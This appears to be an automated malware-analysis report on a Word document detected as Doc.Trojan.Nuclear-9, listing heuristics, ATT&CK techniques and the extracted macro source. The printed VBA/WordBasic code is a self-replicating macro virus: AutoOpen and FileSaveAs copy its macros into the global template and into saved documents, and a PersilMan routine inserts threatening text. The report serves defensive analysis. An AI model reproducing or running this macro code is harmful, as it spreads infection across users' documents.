MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing VBA macros, as indicated by multiple heuristic firings including OLE_VBA_MACROS and OLE_VBA_AUTOOPEN. The AutoOpen macro in the 'macros.bas' script is designed to copy itself and other macros to the current document, suggesting an attempt to spread or establish persistence. The presence of 'Nuclear.T.DOK' in the document body and the ClamAV detection 'Doc.Trojan.Nuclear-9' strongly suggest a malicious intent, likely related to macro-based malware.
Heuristics 4
-
ClamAV: Doc.Trojan.Nuclear-9 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Nuclear-9
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17372 bytes |
SHA-256: fe51c7647420875b1780f181f1f4c36eaf33c10f6febf66af5f6aabe24e8cbcb |
|||
|
Detection
ClamAV:
Doc.Trojan.Nuclear-9
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "FilePrintDefault"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Prints the active document using the current defaults"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FilePrintDefault.MAIN"
WordBasic.Call "PersilMan"
WordBasic.FilePrintDefault
End Sub
Attribute VB_Name = "FileSaveAs"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Saves a copy of the document in a separate file"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSaveAs.MAIN"
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
On Error GoTo -1: On Error GoTo Busted
WordBasic.CurValues.FileSaveAs dlg
WordBasic.Dialog.FileSaveAs dlg
If (dlg.Format = 0) Or (dlg.Format = 1) Then
WordBasic.MacroCopy "Global:AutoExec", WordBasic.[WindowName$]() + ":AutoExec", 0
WordBasic.MacroCopy "Global:AutoOpen", WordBasic.[WindowName$]() + ":AutoOpen", 0
WordBasic.MacroCopy "Global:FileSaveAs", WordBasic.[WindowName$]() + ":FileSaveAs", 0
WordBasic.MacroCopy "Global:FilePrint", WordBasic.[WindowName$]() + ":FilePrint", 0
WordBasic.MacroCopy "Global:FileOpen", WordBasic.[WindowName$]() + ":FileOpen", 0
WordBasic.MacroCopy "Global:FilePrintDefault", WordBasic.[WindowName$]() + ":FilePrintDefault", 0
WordBasic.MacroCopy "Global:PersilMan", WordBasic.[WindowName$]() + ":PersilMan", 0
WordBasic.MacroCopy "Global:ClearKepek", WordBasic.[WindowName$]() + ":ClearKepek", 0
dlg.Format = 1
End If
WordBasic.FileSaveAs dlg
GoTo EndIt
Busted:
Rem If Err <> 102 Then
Rem FileSaveAs dlg
Rem EndIf
EndIt:
End Sub
Attribute VB_Name = "ClearKepek"
Public Sub MAIN()
Rem Do kust nothing
End Sub
Attribute VB_Name = "PersilMan"
Public Sub MAIN()
If WordBasic.Month(WordBasic.Now()) > 4 And WordBasic.Day(WordBasic.Now()) > 20 Then
If WordBasic.Second(WordBasic.Now()) > 55 Then
WordBasic.EndOfDocument
WordBasic.Insert Chr___() '$11
WordBasic.Insert "PersilMan will take his revenge"
WordBasic.Insert Chr___() '$11
WordBasic.Insert "you will be cleaned up by PersilMan, SOON"
WordBasic.StartOfDocument
End If
End If
End Sub
Attribute VB_Name = "FilePrint"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Prints the active document"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FilePrint.MAIN"
WordBasic.Call "PersilMan"
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FilePrint(False)
WordBasic.CurValues.FilePrint dlg
WordBasic.Dialog.FilePrint dlg
WordBasic.FilePrint dlg
End Sub
Attribute VB_Name = "FileOpen"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Opens an existing document or template"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileOpen.MAIN"
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileOpen(False)
WordBasic.CurValues.FileOpen dlg
WordBasic.Dialog.FileOpen dlg
WordBasic.FileOpen dlg
End Sub
Attribute VB_Name = "AutoOpen"
Public Sub MAIN()
If IfNotInstalled = 0 Then
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoExec", "Global:AutoExec", 0
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoOpen", "Global:AutoOpen", 0
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":FileSaveAs", "Global:FileSaveAs", 0
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":FilePrint", "Global:FilePrint", 0
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":FileOpen", "Global:FileOpen", 0
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":FilePrintDefault", "Global:FilePrintDefault", 0
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":PersilMan", "Global:PersilMan", 0
WordBasic.MacroCopy WordBasic.[WindowName$]() + ":ClearKepek", "Global:ClearKepek", 0
End If
WordBasic.Call "ClearKepek"
End
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.